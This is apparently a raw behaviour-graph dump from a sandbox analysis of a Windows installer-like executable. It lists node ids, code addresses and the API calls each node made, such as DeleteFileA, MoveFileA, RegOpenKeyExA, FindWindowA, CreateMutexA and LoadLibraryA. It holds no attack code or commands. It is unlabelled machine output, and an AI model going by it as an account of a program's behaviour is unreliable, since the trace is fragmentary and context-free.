API calls 53596->53598 53599 44236d 53597->53599 53600 44331f 53598->53600 53601 431bc8 4 API calls 53599->53601 53600->53586 53603 442379 53601->53603 53602 4432fa 53602->53586 53603->53602 53610 441a04 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53603->53610 53605->53587 53606->53581 53607->53589 53608->53591 53609->53593 53610->53603 53611 4165e4 73A25CF0 53612 42e3e7 SetErrorMode 49854 44138c 49855 441395 49854->49855 49856 4413a3 WriteFile 49854->49856 49855->49856 49857 4413ae 49856->49857 53613 40cee8 53614 40cef5 53613->53614 53615 40cefa 53613->53615 53617 406f38 CloseHandle 53614->53617 53617->53615 49858 490f80 49859 490fba 49858->49859 49860 490fbc 49859->49860 49861 490fc6 49859->49861 50058 409088 MessageBeep 49860->50058 49863 490ffe 49861->49863 49864 490fd5 49861->49864 49869 49100d 49863->49869 49870 491036 49863->49870 49866 446ff0 18 API calls 49864->49866 49868 490fe2 49866->49868 50059 406ba0 49868->50059 49873 446ff0 18 API calls 49869->49873 49879 49106e 49870->49879 49880 491045 49870->49880 49876 49101a 49873->49876 50067 406bf0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49876->50067 49886 49107d 49879->49886 49887 491096 49879->49887 49882 446ff0 18 API calls 49880->49882 49881 491025 50068 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49881->50068 49883 491052 49882->49883 50069 406c24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49883->50069 50071 407270 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetCurrentDirectoryA 49886->50071 49892 4910ca 49887->49892 49893 4910a5 49887->49893 49888 49105d 50070 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49888->50070 49891 491085 50072 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49891->50072 49898 4910d9 49892->49898 49899 491102 49892->49899 49895 446ff0 18 API calls 49893->49895 49896 4910b2 49895->49896 50073 407298 49896->50073 49901 446ff0 18 API calls 49898->49901 49904 49113a 49899->49904 49905 491111 
49899->49905 49900 4910ba 50076 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49900->50076 49903 4910e6 49901->49903 50077 42c7fc 49903->50077 49912 491149 49904->49912 49913 491186 49904->49913 49907 446ff0 18 API calls 49905->49907 49909 49111e 49907->49909 50087 4071e8 8 API calls 49909->50087 49915 446ff0 18 API calls 49912->49915 49919 4911be 49913->49919 49920 491195 49913->49920 49914 491129 50088 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49914->50088 49916 491158 49915->49916 49918 446ff0 18 API calls 49916->49918 49921 491169 49918->49921 49926 4911cd 49919->49926 49927 4911f6 49919->49927 49922 446ff0 18 API calls 49920->49922 50089 490c84 8 API calls 49921->50089 49924 4911a2 49922->49924 50091 42c89c 49924->50091 49925 491175 50090 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49925->50090 49930 446ff0 18 API calls 49926->49930 49935 49122e 49927->49935 49936 491205 49927->49936 49932 4911da 49930->49932 50097 42c8c4 49932->50097 49942 49123d 49935->49942 49943 491266 49935->49943 49938 446ff0 18 API calls 49936->49938 49939 491212 49938->49939 50106 42c8f4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 49939->50106 49945 446ff0 18 API calls 49942->49945 49948 49129e 49943->49948 49949 491275 49943->49949 49944 49121d 50107 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49944->50107 49947 49124a 49945->49947 50108 42c924 49947->50108 49956 4912ea 49948->49956 49957 4912ad 49948->49957 49951 446ff0 18 API calls 49949->49951 49953 491282 49951->49953 50114 42c94c 49953->50114 49962 4912f9 49956->49962 49963 49133c 49956->49963 49959 446ff0 18 API calls 49957->49959 49961 4912bc 49959->49961 49964 446ff0 18 API calls 49961->49964 49966 446ff0 18 API calls 49962->49966 49970 49134b 49963->49970 49971 4913af 49963->49971 49965 4912cd 49964->49965 50120 42c4f0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 49965->50120 49968 49130c 49966->49968 
49972 446ff0 18 API calls 49968->49972 49969 4912d9 50121 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49969->50121 50046 446ff0 49970->50046 49979 4913ee 49971->49979 49980 4913be 49971->49980 49975 49131d 49972->49975 50122 490e7c 12 API calls 49975->50122 49976 490fc1 50153 403420 49976->50153 49989 49142d 49979->49989 49990 4913fd 49979->49990 49983 446ff0 18 API calls 49980->49983 49982 49132b 50123 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49982->50123 49986 4913cb 49983->49986 49984 491366 49987 49136a 49984->49987 49988 49139f 49984->49988 50126 4528dc Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection DeleteFileA GetLastError 49986->50126 49993 446ff0 18 API calls 49987->49993 50125 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49988->50125 50001 49146c 49989->50001 50002 49143c 49989->50002 49994 446ff0 18 API calls 49990->49994 49996 491379 49993->49996 49997 49140a 49994->49997 49995 4913d8 50127 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49995->50127 50051 452c54 49996->50051 50128 452744 49997->50128 50010 49147b 50001->50010 50011 4914b4 50001->50011 50006 446ff0 18 API calls 50002->50006 50003 4913e9 50003->49976 50004 491389 50124 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50004->50124 50005 491417 50135 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50005->50135 50009 491449 50006->50009 50136 452de4 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 50009->50136 50013 446ff0 18 API calls 50010->50013 50017 4914fc 50011->50017 50018 4914c3 50011->50018 50015 49148a 50013->50015 50014 491456 50137 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50014->50137 50019 446ff0 18 API calls 50015->50019 50024 49150f 50017->50024 50029 4915c5 50017->50029 50020 446ff0 18 API calls 50018->50020 50021 49149b 50019->50021 50022 
4914d2 50020->50022 50138 447270 50021->50138 50023 446ff0 18 API calls 50022->50023 50025 4914e3 50023->50025 50027 446ff0 18 API calls 50024->50027 50033 447270 5 API calls 50025->50033 50028 49153c 50027->50028 50030 446ff0 18 API calls 50028->50030 50029->49976 50147 446f94 18 API calls 50029->50147 50031 491553 50030->50031 50144 407dcc 7 API calls 50031->50144 50033->49976 50034 4915de 50148 42e8c0 FormatMessageA 50034->50148 50039 491575 50040 446ff0 18 API calls 50039->50040 50041 491589 50040->50041 50145 4084f8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50041->50145 50043 491594 50146 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50043->50146 50045 4915a0 50047 446ff8 50046->50047 50161 436070 50047->50161 50049 447017 50050 42c600 7 API calls 50049->50050 50050->49984 50211 4526f8 50051->50211 50053 452c71 50053->50004 50054 452c6d 50054->50053 50055 452c95 MoveFileA GetLastError 50054->50055 50217 452734 50055->50217 50058->49976 50060 406baf 50059->50060 50061 406bd1 50060->50061 50062 406bc8 50060->50062 50220 403778 50061->50220 50063 403400 4 API calls 50062->50063 50064 406bcf 50063->50064 50066 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50064->50066 50066->49976 50067->49881 50068->49976 50069->49888 50070->49976 50071->49891 50072->49976 50227 403738 50073->50227 50076->49976 50078 403738 50077->50078 50079 42c81f GetFullPathNameA 50078->50079 50080 42c842 50079->50080 50081 42c82b 50079->50081 50083 403494 4 API calls 50080->50083 50081->50080 50082 42c833 50081->50082 50084 4034e0 4 API calls 50082->50084 50085 42c840 50083->50085 50084->50085 50086 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50085->50086 50086->49976 50087->49914 50088->49976 50089->49925 50090->49976 50229 42c794 50091->50229 50094 403778 4 API calls 50095 42c8bd 50094->50095 50096 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50095->50096 50096->49976 50244 42c66c 50097->50244 50100 
42c8e1 50103 403778 4 API calls 50100->50103 50101 42c8d8 50102 403400 4 API calls 50101->50102 50104 42c8df 50102->50104 50103->50104 50105 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50104->50105 50105->49976 50106->49944 50107->49976 50109 42c794 IsDBCSLeadByte 50108->50109 50110 42c934 50109->50110 50111 403778 4 API calls 50110->50111 50112 42c946 50111->50112 50113 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50112->50113 50113->49976 50115 42c794 IsDBCSLeadByte 50114->50115 50116 42c95c 50115->50116 50117 403778 4 API calls 50116->50117 50118 42c96d 50117->50118 50119 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50118->50119 50119->49976 50120->49969 50121->49976 50122->49982 50123->49976 50124->49976 50125->49976 50126->49995 50127->50003 50129 4526f8 2 API calls 50128->50129 50130 45275a 50129->50130 50131 45275e 50130->50131 50132 45277c CreateDirectoryA GetLastError 50130->50132 50131->50005 50133 452734 Wow64RevertWow64FsRedirection 50132->50133 50134 4527a2 50133->50134 50134->50005 50135->49976 50136->50014 50137->49976 50139 447278 50138->50139 50247 4363d8 VariantClear 50139->50247 50141 44729b 50143 4472b2 50141->50143 50248 408bfc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50141->50248 50143->49976 50144->50039 50145->50043 50146->50045 50147->50034 50149 42e8e6 50148->50149 50150 4034e0 4 API calls 50149->50150 50151 42e903 50150->50151 50152 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50151->50152 50152->49976 50154 403426 50153->50154 50155 40344b 50154->50155 50156 402660 4 API calls 50154->50156 50157 403400 50155->50157 50156->50154 50158 403406 50157->50158 50159 40341f 50157->50159 50158->50159 50160 402660 4 API calls 50158->50160 50160->50159 50162 43607c 50161->50162 50164 43609e 50161->50164 50162->50164 50181 408bfc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50162->50181 50163 436121 50190 408bfc LocalAlloc TlsSetValue TlsGetValue 
TlsGetValue 50163->50190 50164->50163 50166 4360f1 50164->50166 50167 4360e5 50164->50167 50168 436115 50164->50168 50169 436109 50164->50169 50174 4360fd 50164->50174 50173 403510 4 API calls 50166->50173 50182 403510 50167->50182 50189 4040e8 18 API calls 50168->50189 50185 403494 50169->50185 50171 436132 50171->50049 50178 4360fa 50173->50178 50174->50049 50178->50049 50180 43611e 50180->50049 50181->50164 50191 4034e0 50182->50191 50186 403498 50185->50186 50187 4034ba 50186->50187 50206 402660 50186->50206 50187->50049 50189->50180 50190->50171 50196 4034bc 50191->50196 50193 4034f0 50194 403400 4 API calls 50193->50194 50195 403508 50194->50195 50195->50049 50197 4034c0 50196->50197 50198 4034dc 50196->50198 50201 402648 50197->50201 50198->50193 50200 4034c9 50200->50193 50202 40264c 50201->50202 50203 402656 50201->50203 50202->50203 50205 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50202->50205 50203->50200 50203->50203 50205->50203 50207 402664 50206->50207 50208 40266e 50206->50208 50207->50208 50210 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50207->50210 50208->50187 50208->50208 50210->50208 50212 452706 50211->50212 50213 452702 50211->50213 50214 45270f Wow64DisableWow64FsRedirection 50212->50214 50215 452728 SetLastError 50212->50215 50213->50054 50216 452723 50214->50216 50215->50216 50216->50054 50218 452743 50217->50218 50219 452739 Wow64RevertWow64FsRedirection 50217->50219 50218->50004 50219->50218 50221 4037aa 50220->50221 50223 40377d 50220->50223 50222 403400 4 API calls 50221->50222 50226 4037a0 50222->50226 50223->50221 50224 403791 50223->50224 50225 4034e0 4 API calls 50224->50225 50225->50226 50226->50064 50228 40373c SetCurrentDirectoryA 50227->50228 50228->49900 50234 42c674 50229->50234 50231 42c7f3 50231->50094 50233 42c7a9 50233->50231 50241 42c43c IsDBCSLeadByte 50233->50241 50237 42c685 50234->50237 50235 42c6e9 50238 42c6e4 50235->50238 50243 42c43c IsDBCSLeadByte 50235->50243 50237->50235 50239 42c6a3 
50237->50239 50238->50233 50239->50238 50242 42c43c IsDBCSLeadByte 50239->50242 50241->50233 50242->50239 50243->50238 50245 42c674 IsDBCSLeadByte 50244->50245 50246 42c673 50245->50246 50246->50100 50246->50101 50247->50141 50248->50143 50249 480002 50250 48000b 50249->50250 50252 480036 50249->50252 50251 480028 50250->50251 50250->50252 50663 4766e4 188 API calls 50251->50663 50253 480075 50252->50253 50665 47eaec LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50252->50665 50254 480099 50253->50254 50257 48008c 50253->50257 50258 48008e 50253->50258 50262 4800d5 50254->50262 50263 4800b7 50254->50263 50267 47eb30 42 API calls 50257->50267 50667 47ebc4 42 API calls 50258->50667 50259 48002d 50259->50252 50664 408bd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 50259->50664 50260 480068 50666 47eb54 42 API calls 50260->50666 50670 47e984 24 API calls 50262->50670 50268 4800cc 50263->50268 50668 47eb54 42 API calls 50263->50668 50267->50254 50669 47e984 24 API calls 50268->50669 50270 4800d3 50272 4800eb 50270->50272 50273 4800e5 50270->50273 50274 4800e9 50272->50274 50275 47eb30 42 API calls 50272->50275 50273->50274 50375 47eb30 50273->50375 50380 47bf1c 50274->50380 50275->50274 50739 47e618 42 API calls 50375->50739 50377 47eb4b 50740 408bd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 50377->50740 50741 42d890 GetWindowsDirectoryA 50380->50741 50382 47bf3a 50383 403450 4 API calls 50382->50383 50384 47bf47 50383->50384 50743 42d8bc GetSystemDirectoryA 50384->50743 50386 47bf4f 50387 403450 4 API calls 50386->50387 50388 47bf5c 50387->50388 50745 42d8e8 50388->50745 50390 47bf64 50391 403450 4 API calls 50390->50391 50392 47bf71 50391->50392 50393 47bf96 50392->50393 50394 47bf7a 50392->50394 50396 403400 4 API calls 50393->50396 50801 42d200 50394->50801 50398 47bf94 50396->50398 50400 47bfdb 50398->50400 50402 42c8c4 5 API calls 50398->50402 50399 403450 4 API calls 50399->50398 50749 47bda4 50400->50749 50404 47bfb6 50402->50404 
50406 403450 4 API calls 50404->50406 50405 403450 4 API calls 50409 47bff7 50405->50409 50407 47bfc3 50406->50407 50407->50400 50410 403450 4 API calls 50407->50410 50408 47c015 50412 47bda4 8 API calls 50408->50412 50409->50408 50411 4035c0 4 API calls 50409->50411 50410->50400 50411->50408 50413 47c024 50412->50413 50414 403450 4 API calls 50413->50414 50415 47c031 50414->50415 50416 47c059 50415->50416 50417 42c3f4 5 API calls 50415->50417 50418 47c0c0 50416->50418 50422 47bda4 8 API calls 50416->50422 50419 47c047 50417->50419 50420 47c0ea 50418->50420 50421 47c0c9 50418->50421 50423 4035c0 4 API calls 50419->50423 50760 42c3f4 50420->50760 50424 42c3f4 5 API calls 50421->50424 50425 47c071 50422->50425 50423->50416 50427 47c0d6 50424->50427 50428 403450 4 API calls 50425->50428 50430 4035c0 4 API calls 50427->50430 50431 47c07e 50428->50431 50433 47c0e8 50430->50433 50434 47c091 50431->50434 50809 453318 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50431->50809 50792 47be88 50433->50792 50436 47bda4 8 API calls 50434->50436 50438 47c0a0 50436->50438 50663->50259 50665->50260 50666->50253 50667->50254 50668->50268 50669->50270 50670->50270 50739->50377 50742 42d8b1 50741->50742 50742->50382 50744 42d8dd 50743->50744 50744->50386 50746 403400 4 API calls 50745->50746 50747 42d8f8 GetModuleHandleA GetProcAddress 50746->50747 50748 42d911 50747->50748 50748->50390 50811 42de14 50749->50811 50751 47bdca 50752 47bdf0 50751->50752 50753 47bdce 50751->50753 50755 403400 4 API calls 50752->50755 50814 42dd44 50753->50814 50756 47bdf7 50755->50756 50756->50405 50758 47bde5 RegCloseKey 50758->50756 50759 403400 4 API calls 50759->50758 50761 42c421 50760->50761 50762 42c3fe 50760->50762 50764 403494 4 API calls 50761->50764 50848 42c974 CharPrevA 50762->50848 50765 42c42a 50764->50765 50766 42c405 50766->50761 50802 4038a4 4 API calls 50801->50802 50803 42d213 50802->50803 50804 42d22a GetEnvironmentVariableA 50803->50804 50808 42d23d 50803->50808 50849 42dbc8 
LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50803->50849 50804->50803 50805 42d236 50804->50805 50806 403400 4 API calls 50805->50806 50806->50808 50808->50399 50809->50434 50812 42de25 RegOpenKeyExA 50811->50812 50813 42de1f 50811->50813 50812->50751 50813->50812 50817 42dbf8 50814->50817 50818 42dc1e RegQueryValueExA 50817->50818 50824 42dc41 50818->50824 50833 42dc63 50818->50833 50819 403400 4 API calls 50821 42dd2f 50819->50821 50820 42dc5b 50822 403400 4 API calls 50820->50822 50821->50758 50821->50759 50822->50833 50823 4034e0 4 API calls 50823->50824 50824->50820 50824->50823 50824->50833 50834 403744 50824->50834 50826 42dc98 RegQueryValueExA 50826->50818 50827 42dcb4 50826->50827 50827->50833 50838 4038a4 50827->50838 50830 42dd08 50831 403450 4 API calls 50830->50831 50831->50833 50832 403744 4 API calls 50832->50830 50833->50819 50835 40374a 50834->50835 50837 40375b 50834->50837 50836 4034bc 4 API calls 50835->50836 50835->50837 50836->50837 50837->50826 50839 4038b1 50838->50839 50840 4038e1 50838->50840 50841 4038da 50839->50841 50843 4038bd 50839->50843 50842 403400 4 API calls 50840->50842 50844 4034bc 4 API calls 50841->50844 50845 4038cb 50842->50845 50847 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50843->50847 50844->50840 50845->50830 50845->50832 50847->50845 50848->50766 50849->50803 52914 491d44 52915 491d78 52914->52915 52916 491d7a 52915->52916 52917 491d8e 52915->52917 53050 446f94 18 API calls 52916->53050 52920 491dca 52917->52920 52921 491d9d 52917->52921 52919 491d83 Sleep 52976 491dc5 52919->52976 52926 491dd9 52920->52926 52927 491e06 52920->52927 52922 446ff0 18 API calls 52921->52922 52925 491dac 52922->52925 52923 403420 4 API calls 52924 492238 52923->52924 52928 491db4 FindWindowA 52925->52928 52929 446ff0 18 API calls 52926->52929 52932 491e5c 52927->52932 52933 491e15 52927->52933 52931 447270 5 API calls 52928->52931 52930 491de6 52929->52930 52934 491dee FindWindowA 52930->52934 52931->52976 52938 491eb8 
52932->52938 52939 491e6b 52932->52939 53051 446f94 18 API calls 52933->53051 52936 447270 5 API calls 52934->52936 52992 491e01 52936->52992 52937 491e21 53052 446f94 18 API calls 52937->53052 52945 491f14 52938->52945 52946 491ec7 52938->52946 53055 446f94 18 API calls 52939->53055 52942 491e2e 53053 446f94 18 API calls 52942->53053 52943 491e77 53056 446f94 18 API calls 52943->53056 52956 491f4e 52945->52956 52957 491f23 52945->52957 53060 446f94 18 API calls 52946->53060 52948 491e3b 53054 446f94 18 API calls 52948->53054 52950 491e84 53057 446f94 18 API calls 52950->53057 52952 491e46 SendMessageA 52955 447270 5 API calls 52952->52955 52953 491ed3 53061 446f94 18 API calls 52953->53061 52955->52992 52967 491f5d 52956->52967 52973 491f9c 52956->52973 52960 446ff0 18 API calls 52957->52960 52959 491e91 53058 446f94 18 API calls 52959->53058 52963 491f30 52960->52963 52961 491ee0 53062 446f94 18 API calls 52961->53062 52969 491f38 RegisterClipboardFormatA 52963->52969 52965 491e9c PostMessageA 53059 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52965->53059 52966 491eed 53063 446f94 18 API calls 52966->53063 53065 446f94 18 API calls 52967->53065 52972 447270 5 API calls 52969->52972 52972->52976 52977 491fab 52973->52977 52978 491ff0 52973->52978 52974 491ef8 SendNotifyMessageA 53064 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52974->53064 52975 491f69 53066 446f94 18 API calls 52975->53066 52976->52923 53068 446f94 18 API calls 52977->53068 52986 491fff 52978->52986 52987 492044 52978->52987 52981 491f76 53067 446f94 18 API calls 52981->53067 52984 491fb7 53069 446f94 18 API calls 52984->53069 52985 491f81 SendMessageA 52989 447270 5 API calls 52985->52989 53072 446f94 18 API calls 52986->53072 52995 492053 52987->52995 52996 4920a6 52987->52996 52989->52992 52991 491fc4 53070 446f94 18 API calls 52991->53070 52992->52976 52993 49200b 53073 446f94 18 API calls 52993->53073 52999 446ff0 18 API calls 52995->52999 53004 
49212d 52996->53004 53005 4920b5 52996->53005 52998 491fcf PostMessageA 53071 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52998->53071 53002 492060 52999->53002 53000 492018 53074 446f94 18 API calls 53000->53074 53006 42e38c 2 API calls 53002->53006 53015 49213c 53004->53015 53016 492162 53004->53016 53008 446ff0 18 API calls 53005->53008 53009 49206d 53006->53009 53007 492023 SendNotifyMessageA 53075 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53007->53075 53011 4920c4 53008->53011 53012 492083 GetLastError 53009->53012 53013 492073 53009->53013 53076 446f94 18 API calls 53011->53076 53017 447270 5 API calls 53012->53017 53014 447270 5 API calls 53013->53014 53018 492081 53014->53018 53081 446f94 18 API calls 53015->53081 53023 492171 53016->53023 53024 492194 53016->53024 53017->53018 53022 447270 5 API calls 53018->53022 53021 492146 FreeLibrary 53082 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53021->53082 53022->52976 53027 446ff0 18 API calls 53023->53027 53033 4921a3 53024->53033 53039 4921d7 53024->53039 53025 4920d7 GetProcAddress 53028 49211d 53025->53028 53029 4920e3 53025->53029 53030 49217d 53027->53030 53080 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53028->53080 53077 446f94 18 API calls 53029->53077 53035 492185 CreateMutexA 53030->53035 53083 48c174 18 API calls 53033->53083 53034 4920ef 53078 446f94 18 API calls 53034->53078 53035->52976 53038 4920fc 53042 447270 5 API calls 53038->53042 53039->52976 53085 48c174 18 API calls 53039->53085 53041 4921af 53043 4921c0 OemToCharBuffA 53041->53043 53044 49210d 53042->53044 53084 48c18c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53043->53084 53079 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53044->53079 53047 4921f2 53048 492203 CharToOemBuffA 53047->53048 53086 48c18c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53048->53086 53050->52919 53051->52937 
[Execution graph data: the behaviour-graph widget's edge list (node id -> node id pairs such as 53052->52942, function addresses such as 41ee4c, and the Windows API calls recorded at each node) is not reproducible as text. APIs named in the graph nodes: IsWindowVisible, IsWindowEnabled, EnableWindow, LocalAlloc, TlsSetValue, TlsGetValue, InterlockedExchange, GetWindowLongA, SetWindowLongA, GetSystemMetrics, SetScrollInfo, ScrollWindow, SetWindowPos, GetScrollPos, SetScrollPos, KiUserCallbackDispatcher, MulDiv, DeleteObject, LoadStringA, SetPropA, IsIconic, GetFocus, SetFocus, SendMessageA, PostMessageA, NtdllDefWindowProc_A, WinHelpA, GetCurrentThreadId, ShowWindow, PostQuitMessage, EnumWindows, GetWindow, GetSystemDefaultLCID, GetLocaleInfoA, SetActiveWindow, LoadIconA, IsWindow, SystemParametersInfoA, CharNextA, GetDriveTypeA, SHPathPrepareForWriteA, IsDBCSLeadByte, RegOpenKeyExA, RegCloseKey, RegisterClassA, CreateWindowExA, GetActiveWindow, GetWindowTextA, SetCurrentDirectoryA.]
53405->53409 53407 403400 4 API calls 53408 493f44 53407->53408 53410 403400 4 API calls 53408->53410 53411 4037b8 4 API calls 53409->53411 53413 493ea3 53409->53413 53412 493f4c 53410->53412 53414 493ebc 53411->53414 53412->53399 53413->53407 53414->53413 53415 4037b8 4 API calls 53414->53415 53416 493edf 53415->53416 53417 403778 4 API calls 53416->53417 53418 493f10 53417->53418 53419 403634 4 API calls 53418->53419 53419->53404 53420->53398 53422 44894d 53421->53422 53423 448990 53421->53423 53424 403494 4 API calls 53422->53424 53426 4489a4 53423->53426 53433 448524 53423->53433 53425 448958 53424->53425 53430 4037b8 4 API calls 53425->53430 53428 403400 4 API calls 53426->53428 53429 4489d7 53428->53429 53429->53413 53431 448974 53430->53431 53432 4037b8 4 API calls 53431->53432 53432->53423 53434 403494 4 API calls 53433->53434 53435 44855a 53434->53435 53436 4037b8 4 API calls 53435->53436 53437 44856c 53436->53437 53438 403778 4 API calls 53437->53438 53439 44858d 53438->53439 53440 4037b8 4 API calls 53439->53440 53441 4485a5 53440->53441 53442 403778 4 API calls 53441->53442 53443 4485d0 53442->53443 53444 4037b8 4 API calls 53443->53444 53455 4485e8 53444->53455 53445 448620 53447 403420 4 API calls 53445->53447 53446 4486bb 53449 4486c3 GetProcAddress 53446->53449 53450 448700 53447->53450 53448 448655 LoadLibraryA 53448->53455 53452 4486d6 53449->53452 53450->53426 53451 448643 LoadLibraryExA 53451->53455 53452->53445 53453 403b80 4 API calls 53453->53455 53454 403450 4 API calls 53454->53455 53455->53445 53455->53446 53455->53448 53455->53451 53455->53453 53455->53454 53457 43da80 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53455->53457 53457->53455 56415 416b3a 56416 416be2 56415->56416 56417 416b52 56415->56417 56434 415314 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56416->56434 56418 416b60 56417->56418 56419 416b6c SendMessageA 56417->56419 56421 416b86 56418->56421 56422 416b6a CallWindowProcA 56418->56422 56430 416bc0 56419->56430 56431 
41a050 GetSysColor 56421->56431 56422->56430 56425 416b91 SetTextColor 56426 416ba6 56425->56426 56432 41a050 GetSysColor 56426->56432 56428 416bab SetBkColor 56433 41a6d8 GetSysColor CreateBrushIndirect 56428->56433 56431->56425 56432->56428 56433->56430 56434->56430 53458 40ce1c 53461 406f00 WriteFile 53458->53461 53462 406f1d 53461->53462 56435 4980b4 56493 403344 56435->56493 56437 4980c2 56496 4056a0 56437->56496 56439 4980c7 56499 40631c GetModuleHandleA GetProcAddress 56439->56499 56445 4980d6 56516 41094c 56445->56516 56447 4980db 56520 412920 56447->56520 56449 4980e5 56525 419038 GetVersion 56449->56525 56767 4032fc 56493->56767 56495 403349 GetModuleHandleA GetCommandLineA 56495->56437 56497 4056db 56496->56497 56768 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56496->56768 56497->56439 56500 406338 56499->56500 56501 40633f GetProcAddress 56499->56501 56500->56501 56502 406355 GetProcAddress 56501->56502 56503 40634e 56501->56503 56504 406364 SetProcessDEPPolicy 56502->56504 56505 406368 56502->56505 56503->56502 56504->56505 56506 40993c 56505->56506 56769 409014 56506->56769 56511 408710 7 API calls 56512 40995f 56511->56512 56784 409060 GetVersionExA 56512->56784 56515 409b70 6F551CD0 56515->56445 56517 410956 56516->56517 56518 410995 GetCurrentThreadId 56517->56518 56519 4109b0 56518->56519 56519->56447 56786 40aef4 56520->56786 56524 41294c 56524->56449 56798 41de1c 8 API calls 56525->56798 56527 419051 56800 418f30 GetCurrentProcessId 56527->56800 56767->56495 56768->56497 56770 408cac 5 API calls 56769->56770 56771 409025 56770->56771 56772 4085cc GetSystemDefaultLCID 56771->56772 56774 408602 56772->56774 56773 406ddc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56773->56774 56774->56773 56775 408558 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 56774->56775 56776 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56774->56776 56778 408664 56774->56778 56775->56774 56776->56774 56777 406ddc LocalAlloc 
TlsSetValue TlsGetValue TlsGetValue LoadStringA 56777->56778 56778->56777 56779 408558 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 56778->56779 56780 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56778->56780 56781 4086e7 56778->56781 56779->56778 56780->56778 56782 403420 4 API calls 56781->56782 56783 408701 56782->56783 56783->56511 56785 409077 56784->56785 56785->56515 56788 40aefb 56786->56788 56787 40af1a 56790 411004 56787->56790 56788->56787 56797 40ae2c 19 API calls 56788->56797 56791 411026 56790->56791 56792 406ddc 5 API calls 56791->56792 56793 403450 4 API calls 56791->56793 56794 411045 56791->56794 56792->56791 56793->56791 56795 403400 4 API calls 56794->56795 56796 41105a 56795->56796 56796->56524 56797->56788 56799 41de96 56798->56799 56799->56527 56816 4078b0 56800->56816 56817 4078c3 56816->56817 56818 4075a8 19 API calls 56817->56818 56819 4078d7 GlobalAddAtomA GetCurrentThreadId 56818->56819 58075 41663c 58076 4166a3 58075->58076 58077 416649 58075->58077 58083 4162c2 58077->58083 58087 416548 CreateWindowExA 58077->58087 58078 416650 SetPropA SetPropA 58078->58076 58079 416683 58078->58079 58080 416696 SetWindowPos 58079->58080 58080->58076 58084 4162ee 58083->58084 58085 4162ce GetClassInfoA 58083->58085 58084->58078 58085->58084 58086 4162e2 GetClassInfoA 58085->58086 58086->58084 58087->58078 53463 4222dc 53464 4222eb 53463->53464 53469 42126c 53464->53469 53467 42230b 53470 4212db 53469->53470 53484 42127b 53469->53484 53473 4212ec 53470->53473 53494 4124c8 GetMenuItemCount GetMenuStringA GetMenuState 53470->53494 53472 42131a 53476 42138d 53472->53476 53481 421335 53472->53481 53473->53472 53475 4213b2 53473->53475 53474 42138b 53477 4213de 53474->53477 53496 421e24 11 API calls 53474->53496 53475->53474 53479 4213c6 SetMenu 53475->53479 53476->53474 53483 4213a1 53476->53483 53497 4211b4 10 API calls 53477->53497 53479->53474 53481->53474 53487 421358 GetMenu 53481->53487 53482 4213e5 53482->53467 53492 4221e0 
